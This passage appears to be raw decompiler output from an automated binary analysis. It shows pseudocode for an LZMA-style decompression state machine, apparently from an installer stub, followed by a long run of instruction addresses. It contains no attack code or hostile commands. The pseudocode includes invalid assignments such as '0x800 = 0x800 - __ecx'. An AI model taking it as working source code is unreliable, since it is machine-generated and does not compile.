                                                                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											_t484 = __ebp - 0x70;
                                                                                                                                                                                                              											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              											__eflags =  *_t484;
                                                                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											L148:
                                                                                                                                                                                                              											_t487 = __ebp - 0x48;
                                                                                                                                                                                                              											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                                              											__eflags =  *_t487;
                                                                                                                                                                                                              											goto L149;
                                                                                                                                                                                                              										case 0x19:
                                                                                                                                                                                                              											__eflags = __ebx - 4;
                                                                                                                                                                                                              											if(__ebx < 4) {
                                                                                                                                                                                                              												 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                                                                              												L120:
                                                                                                                                                                                                              												_t394 = __ebp - 0x2c;
                                                                                                                                                                                                              												 *_t394 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                                                                              												__eflags =  *_t394;
                                                                                                                                                                                                              												L121:
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                                                                              												if(__eax == 0) {
                                                                                                                                                                                                              													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                                                                              													goto L170;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                                                                              												if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                                                                              													goto L171;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x30);
                                                                                                                                                                                                              												_t401 = __ebp - 0x60;
                                                                                                                                                                                                              												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                                                                              												__eflags =  *_t401;
                                                                                                                                                                                                              												goto L124;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__ecx = __ebx;
                                                                                                                                                                                                              											__eax = __ebx;
                                                                                                                                                                                                              											__ecx = __ebx >> 1;
                                                                                                                                                                                                              											__eax = __ebx & 0x00000001;
                                                                                                                                                                                                              											__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                                                              											__al = __al | 0x00000002;
                                                                                                                                                                                                              											__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                                                              											__eflags = __ebx - 0xe;
                                                                                                                                                                                                              											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                              											if(__ebx >= 0xe) {
                                                                                                                                                                                                              												__ebx = 0;
                                                                                                                                                                                                              												 *(__ebp - 0x48) = __ecx;
                                                                                                                                                                                                              												L103:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                                              												if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                                              													__eax = __eax + __ebx;
                                                                                                                                                                                                              													 *(__ebp - 0x40) = 4;
                                                                                                                                                                                                              													 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                              													__eax =  *(__ebp - 4);
                                                                                                                                                                                                              													__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                                                                              													L109:
                                                                                                                                                                                                              													__ebx = 0;
                                                                                                                                                                                                              													 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                              													 *(__ebp - 0x50) = 1;
                                                                                                                                                                                                              													 *(__ebp - 0x44) = 0;
                                                                                                                                                                                                              													 *(__ebp - 0x48) = 0;
                                                                                                                                                                                                              													L113:
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                              													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                                              													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                                                                              														_t392 = __ebp - 0x2c;
                                                                                                                                                                                                              														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                                                                              														__eflags =  *_t392;
                                                                                                                                                                                                              														goto L120;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x50);
                                                                                                                                                                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              													__esi = __edi + __eax;
                                                                                                                                                                                                              													 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              													__ax =  *__esi;
                                                                                                                                                                                                              													__ecx = __ax & 0x0000ffff;
                                                                                                                                                                                                              													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                                                                              													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                                              													if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                                                                              														__ecx = 0;
                                                                                                                                                                                                              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                                                                              														__ecx = 1;
                                                                                                                                                                                                              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                                              														__ebx = 1;
                                                                                                                                                                                                              														__ecx =  *(__ebp - 0x48);
                                                                                                                                                                                                              														__ebx = 1 << __cl;
                                                                                                                                                                                                              														__ecx = 1 << __cl;
                                                                                                                                                                                                              														__ebx =  *(__ebp - 0x44);
                                                                                                                                                                                                              														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                                                                              														__cx = __ax;
                                                                                                                                                                                                              														__cx = __ax >> 5;
                                                                                                                                                                                                              														__eax = __eax - __ecx;
                                                                                                                                                                                                              														__edi = __edi + 1;
                                                                                                                                                                                                              														__eflags = __edi;
                                                                                                                                                                                                              														 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              														 *__esi = __ax;
                                                                                                                                                                                                              														 *(__ebp - 0x50) = __edi;
                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                              														 *(__ebp - 0x10) = __edx;
                                                                                                                                                                                                              														0x800 = 0x800 - __ecx;
                                                                                                                                                                                                              														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                                                                              														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                                              														 *__esi = __dx;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              														L112:
                                                                                                                                                                                                              														_t369 = __ebp - 0x48;
                                                                                                                                                                                                              														 *_t369 =  *(__ebp - 0x48) + 1;
                                                                                                                                                                                                              														__eflags =  *_t369;
                                                                                                                                                                                                              														goto L113;
                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                              														goto L110;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0xc);
                                                                                                                                                                                                              												__ebx = __ebx + __ebx;
                                                                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                                                              												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                                                                                                              													__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                                                              													__ebx = __ebx | 0x00000001;
                                                                                                                                                                                                              													__eflags = __ebx;
                                                                                                                                                                                                              													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              													L102:
                                                                                                                                                                                                              													_t339 = __ebp - 0x48;
                                                                                                                                                                                                              													 *_t339 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                                              													__eflags =  *_t339;
                                                                                                                                                                                                              													goto L103;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													goto L100;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__edx =  *(__ebp - 4);
                                                                                                                                                                                                              											__eax = __eax - __ebx;
                                                                                                                                                                                                              											 *(__ebp - 0x40) = __ecx;
                                                                                                                                                                                                              											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                                                                                                              											goto L109;
                                                                                                                                                                                                              										case 0x1a:
                                                                                                                                                                                                              											L56:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                                              											if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                              												 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x68);
                                                                                                                                                                                                              											__al =  *(__ebp - 0x5c);
                                                                                                                                                                                                              											__edx =  *(__ebp - 8);
                                                                                                                                                                                                              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                                              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                              											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                              											 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x14);
                                                                                                                                                                                                              											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                                                                              											__eax = __ecx + 1;
                                                                                                                                                                                                              											__edx = 0;
                                                                                                                                                                                                              											_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                                              											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                              											__edx = _t192;
                                                                                                                                                                                                              											goto L80;
                                                                                                                                                                                                              										case 0x1b:
                                                                                                                                                                                                              											L76:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                                              											if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                              												 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                              											__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                                              											if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                              												__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__edx =  *(__ebp - 8);
                                                                                                                                                                                                              											__cl =  *(__eax + __edx);
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                              											 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                                                              											 *(__eax + __edx) = __cl;
                                                                                                                                                                                                              											__eax = __eax + 1;
                                                                                                                                                                                                              											__edx = 0;
                                                                                                                                                                                                              											_t275 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                                              											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                              											__edx = _t275;
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x68);
                                                                                                                                                                                                              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                                              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                              											_t284 = __ebp - 0x64;
                                                                                                                                                                                                              											 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                              											__eflags =  *_t284;
                                                                                                                                                                                                              											 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                                                              											L80:
                                                                                                                                                                                                              											 *(__ebp - 0x14) = __edx;
                                                                                                                                                                                                              											goto L81;
                                                                                                                                                                                                              										case 0x1c:
                                                                                                                                                                                                              											while(1) {
                                                                                                                                                                                                              												L124:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                                              												if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                              													break;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                              												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                                              												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                              													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__edx =  *(__ebp - 8);
                                                                                                                                                                                                              												__cl =  *(__eax + __edx);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                              												 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                                                              												 *(__eax + __edx) = __cl;
                                                                                                                                                                                                              												__eax = __eax + 1;
                                                                                                                                                                                                              												__edx = 0;
                                                                                                                                                                                                              												_t415 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                                              												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                              												__edx = _t415;
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x68);
                                                                                                                                                                                                              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                              												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x30);
                                                                                                                                                                                                              												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                                                              												 *(__ebp - 0x14) = _t415;
                                                                                                                                                                                                              												if( *(__ebp - 0x30) > 0) {
                                                                                                                                                                                                              													continue;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													L81:
                                                                                                                                                                                                              													 *(__ebp - 0x88) = 2;
                                                                                                                                                                                                              													goto L1;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											 *(__ebp - 0x88) = 0x1c;
                                                                                                                                                                                                              											L170:
                                                                                                                                                                                                              											_push(0x22);
                                                                                                                                                                                                              											_pop(_t567);
                                                                                                                                                                                                              											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                                                                                                                                                                                              											_t535 = 0;
                                                                                                                                                                                                              											L172:
                                                                                                                                                                                                              											return _t535;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								L171:
                                                                                                                                                                                                              								_t535 = _t534 | 0xffffffff;
                                                                                                                                                                                                              								goto L172;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						__eax =  *(__ebp - 0x50);
                                                                                                                                                                                                              						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                                              						__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              						__esi = __edx + __eax;
                                                                                                                                                                                                              						 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              						__ax =  *__esi;
                                                                                                                                                                                                              						__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                              						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                              						if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              							__cx = __ax;
                                                                                                                                                                                                              							__cx = __ax >> 5;
                                                                                                                                                                                                              							__eax = __eax - __ecx;
                                                                                                                                                                                                              							__edx = __edx + 1;
                                                                                                                                                                                                              							 *__esi = __ax;
                                                                                                                                                                                                              							 *(__ebp - 0x50) = __edx;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                              							0x800 = 0x800 - __edi;
                                                                                                                                                                                                              							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                              							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                                              							 *__esi = __cx;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              							goto L148;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							goto L146;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					goto L1;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              			}








                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f5b
                                                                                                                                                                                                              0x00406f5b
                                                                                                                                                                                                              0x00406f5f
                                                                                                                                                                                                              0x00406f84
                                                                                                                                                                                                              0x00406f8e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f61
                                                                                                                                                                                                              0x00406f61
                                                                                                                                                                                                              0x00406f64
                                                                                                                                                                                                              0x00406f68
                                                                                                                                                                                                              0x00406f6b
                                                                                                                                                                                                              0x00406f6e
                                                                                                                                                                                                              0x00406f72
                                                                                                                                                                                                              0x00406f72
                                                                                                                                                                                                              0x00406f75
                                                                                                                                                                                                              0x0040704f
                                                                                                                                                                                                              0x0040704f
                                                                                                                                                                                                              0x00407056
                                                                                                                                                                                                              0x00407056
                                                                                                                                                                                                              0x00407059
                                                                                                                                                                                                              0x00407060
                                                                                                                                                                                                              0x0040708d
                                                                                                                                                                                                              0x00407091
                                                                                                                                                                                                              0x004070f1
                                                                                                                                                                                                              0x004070f4
                                                                                                                                                                                                              0x004070f9
                                                                                                                                                                                                              0x004070fa
                                                                                                                                                                                                              0x004070fc
                                                                                                                                                                                                              0x004070fe
                                                                                                                                                                                                              0x00407101
                                                                                                                                                                                                              0x0040700d
                                                                                                                                                                                                              0x0040700d
                                                                                                                                                                                                              0x0040700d
                                                                                                                                                                                                              0x004067a9
                                                                                                                                                                                                              0x004067a9
                                                                                                                                                                                                              0x004067a9
                                                                                                                                                                                                              0x004067b2
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004067b8
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004067c3
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004067cc
                                                                                                                                                                                                              0x004067cf
                                                                                                                                                                                                              0x004067d2
                                                                                                                                                                                                              0x004067d6
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004067dc
                                                                                                                                                                                                              0x004067df
                                                                                                                                                                                                              0x004067e1
                                                                                                                                                                                                              0x004067e2
                                                                                                                                                                                                              0x004067e5
                                                                                                                                                                                                              0x004067e7
                                                                                                                                                                                                              0x004067e8
                                                                                                                                                                                                              0x004067ea
                                                                                                                                                                                                              0x004067ed
                                                                                                                                                                                                              0x004067f2
                                                                                                                                                                                                              0x004067f7
                                                                                                                                                                                                              0x00406800
                                                                                                                                                                                                              0x00406813
                                                                                                                                                                                                              0x00406816
                                                                                                                                                                                                              0x00406822
                                                                                                                                                                                                              0x0040684a
                                                                                                                                                                                                              0x0040684c
                                                                                                                                                                                                              0x0040685a
                                                                                                                                                                                                              0x0040685a
                                                                                                                                                                                                              0x0040685e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040684e
                                                                                                                                                                                                              0x0040684e
                                                                                                                                                                                                              0x00406851
                                                                                                                                                                                                              0x00406852
                                                                                                                                                                                                              0x00406852
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040684e
                                                                                                                                                                                                              0x00406828
                                                                                                                                                                                                              0x0040682d
                                                                                                                                                                                                              0x0040682d
                                                                                                                                                                                                              0x00406836
                                                                                                                                                                                                              0x0040683e
                                                                                                                                                                                                              0x00406841
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406847
                                                                                                                                                                                                              0x00406847
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406847
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406864
                                                                                                                                                                                                              0x00406864
                                                                                                                                                                                                              0x00406868
                                                                                                                                                                                                              0x00407114
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407114
                                                                                                                                                                                                              0x00406871
                                                                                                                                                                                                              0x00406881
                                                                                                                                                                                                              0x00406884
                                                                                                                                                                                                              0x00406887
                                                                                                                                                                                                              0x00406887
                                                                                                                                                                                                              0x00406887
                                                                                                                                                                                                              0x0040688a
                                                                                                                                                                                                              0x0040688e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406890
                                                                                                                                                                                                              0x00406896
                                                                                                                                                                                                              0x004068c0
                                                                                                                                                                                                              0x004068c6
                                                                                                                                                                                                              0x004068cd
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004068cd
                                                                                                                                                                                                              0x0040689c
                                                                                                                                                                                                              0x0040689f
                                                                                                                                                                                                              0x004068a4
                                                                                                                                                                                                              0x004068a4
                                                                                                                                                                                                              0x004068af
                                                                                                                                                                                                              0x004068b7
                                                                                                                                                                                                              0x004068ba
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004068ff
                                                                                                                                                                                                              0x00406905
                                                                                                                                                                                                              0x00406908
                                                                                                                                                                                                              0x00406915
                                                                                                                                                                                                              0x0040691d
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004068d4
                                                                                                                                                                                                              0x004068d4
                                                                                                                                                                                                              0x004068d8
                                                                                                                                                                                                              0x00407123
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407123
                                                                                                                                                                                                              0x004068e4
                                                                                                                                                                                                              0x004068ef
                                                                                                                                                                                                              0x004068ef
                                                                                                                                                                                                              0x004068ef
                                                                                                                                                                                                              0x004068f2
                                                                                                                                                                                                              0x004068f5
                                                                                                                                                                                                              0x004068f8
                                                                                                                                                                                                              0x004068fd
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f94
                                                                                                                                                                                                              0x00406f94
                                                                                                                                                                                                              0x00406f9a
                                                                                                                                                                                                              0x00406fa0
                                                                                                                                                                                                              0x00406fa6
                                                                                                                                                                                                              0x00406fc0
                                                                                                                                                                                                              0x00406fc3
                                                                                                                                                                                                              0x00406fc9
                                                                                                                                                                                                              0x00406fd4
                                                                                                                                                                                                              0x00406fd4
                                                                                                                                                                                                              0x00406fd6
                                                                                                                                                                                                              0x00406fa8
                                                                                                                                                                                                              0x00406fa8
                                                                                                                                                                                                              0x00406fb7
                                                                                                                                                                                                              0x00406fbb
                                                                                                                                                                                                              0x00406fbb
                                                                                                                                                                                                              0x00406fe0
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406fe2
                                                                                                                                                                                                              0x00406fe6
                                                                                                                                                                                                              0x00407195
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407195
                                                                                                                                                                                                              0x00406ff2
                                                                                                                                                                                                              0x00406ff9
                                                                                                                                                                                                              0x00407001
                                                                                                                                                                                                              0x00407004
                                                                                                                                                                                                              0x00407007
                                                                                                                                                                                                              0x00407007
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406925
                                                                                                                                                                                                              0x00406927
                                                                                                                                                                                                              0x0040692a
                                                                                                                                                                                                              0x0040699b
                                                                                                                                                                                                              0x0040699e
                                                                                                                                                                                                              0x004069a1
                                                                                                                                                                                                              0x004069a8
                                                                                                                                                                                                              0x004069b2
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004069b2
                                                                                                                                                                                                              0x0040692c
                                                                                                                                                                                                              0x00406930
                                                                                                                                                                                                              0x00406933
                                                                                                                                                                                                              0x00406935
                                                                                                                                                                                                              0x00406938
                                                                                                                                                                                                              0x0040693b
                                                                                                                                                                                                              0x0040693d
                                                                                                                                                                                                              0x00406940
                                                                                                                                                                                                              0x00406942
                                                                                                                                                                                                              0x00406947
                                                                                                                                                                                                              0x0040694a
                                                                                                                                                                                                              0x0040694d
                                                                                                                                                                                                              0x00406951
                                                                                                                                                                                                              0x00406958
                                                                                                                                                                                                              0x0040695b
                                                                                                                                                                                                              0x00406962
                                                                                                                                                                                                              0x00406966
                                                                                                                                                                                                              0x0040696e
                                                                                                                                                                                                              0x0040696e
                                                                                                                                                                                                              0x0040696e
                                                                                                                                                                                                              0x00406968
                                                                                                                                                                                                              0x00406968
                                                                                                                                                                                                              0x00406968
                                                                                                                                                                                                              0x0040695d
                                                                                                                                                                                                              0x0040695d
                                                                                                                                                                                                              0x0040695d
                                                                                                                                                                                                              0x00406972
                                                                                                                                                                                                              0x00406975
                                                                                                                                                                                                              0x00406993
                                                                                                                                                                                                              0x00406995
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406977
                                                                                                                                                                                                              0x00406977
                                                                                                                                                                                                              0x0040697a
                                                                                                                                                                                                              0x0040697d
                                                                                                                                                                                                              0x00406980
                                                                                                                                                                                                              0x00406982
                                                                                                                                                                                                              0x00406982
                                                                                                                                                                                                              0x00406982
                                                                                                                                                                                                              0x00406985
                                                                                                                                                                                                              0x00406988
                                                                                                                                                                                                              0x0040698a
                                                                                                                                                                                                              0x0040698b
                                                                                                                                                                                                              0x0040698e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040698e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406bc4
                                                                                                                                                                                                              0x00406bc8
                                                                                                                                                                                                              0x00406be6
                                                                                                                                                                                                              0x00406be9
                                                                                                                                                                                                              0x00406bf0
                                                                                                                                                                                                              0x00406bf3
                                                                                                                                                                                                              0x00406bf6
                                                                                                                                                                                                              0x00406bf9
                                                                                                                                                                                                              0x00406bfc
                                                                                                                                                                                                              0x00406bff
                                                                                                                                                                                                              0x00406c01
                                                                                                                                                                                                              0x00406c08
                                                                                                                                                                                                              0x00406c09
                                                                                                                                                                                                              0x00406c0b
                                                                                                                                                                                                              0x00406c0e
                                                                                                                                                                                                              0x00406c11
                                                                                                                                                                                                              0x00406c14
                                                                                                                                                                                                              0x00406c14
                                                                                                                                                                                                              0x00406c19
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406c19
                                                                                                                                                                                                              0x00406bca
                                                                                                                                                                                                              0x00406bcd
                                                                                                                                                                                                              0x00406bd0
                                                                                                                                                                                                              0x00406bda
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406c2e
                                                                                                                                                                                                              0x00406c32
                                                                                                                                                                                                              0x00406c55
                                                                                                                                                                                                              0x00406c58
                                                                                                                                                                                                              0x00406c5b
                                                                                                                                                                                                              0x00406c65
                                                                                                                                                                                                              0x00406c34
                                                                                                                                                                                                              0x00406c34
                                                                                                                                                                                                              0x00406c37
                                                                                                                                                                                                              0x00406c3a
                                                                                                                                                                                                              0x00406c3d
                                                                                                                                                                                                              0x00406c4a
                                                                                                                                                                                                              0x00406c4d
                                                                                                                                                                                                              0x00406c4d
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406c71
                                                                                                                                                                                                              0x00406c75
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406c7b
                                                                                                                                                                                                              0x00406c7f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406c85
                                                                                                                                                                                                              0x00406c87
                                                                                                                                                                                                              0x00406c8b
                                                                                                                                                                                                              0x00406c8b
                                                                                                                                                                                                              0x00406c8e
                                                                                                                                                                                                              0x00406c92
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406ce2
                                                                                                                                                                                                              0x00406ce6
                                                                                                                                                                                                              0x00406ced
                                                                                                                                                                                                              0x00406cf0
                                                                                                                                                                                                              0x00406cf3
                                                                                                                                                                                                              0x00406cfd
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406cfd
                                                                                                                                                                                                              0x00406ce8
                                                                                                                                                                                                              0x00000000
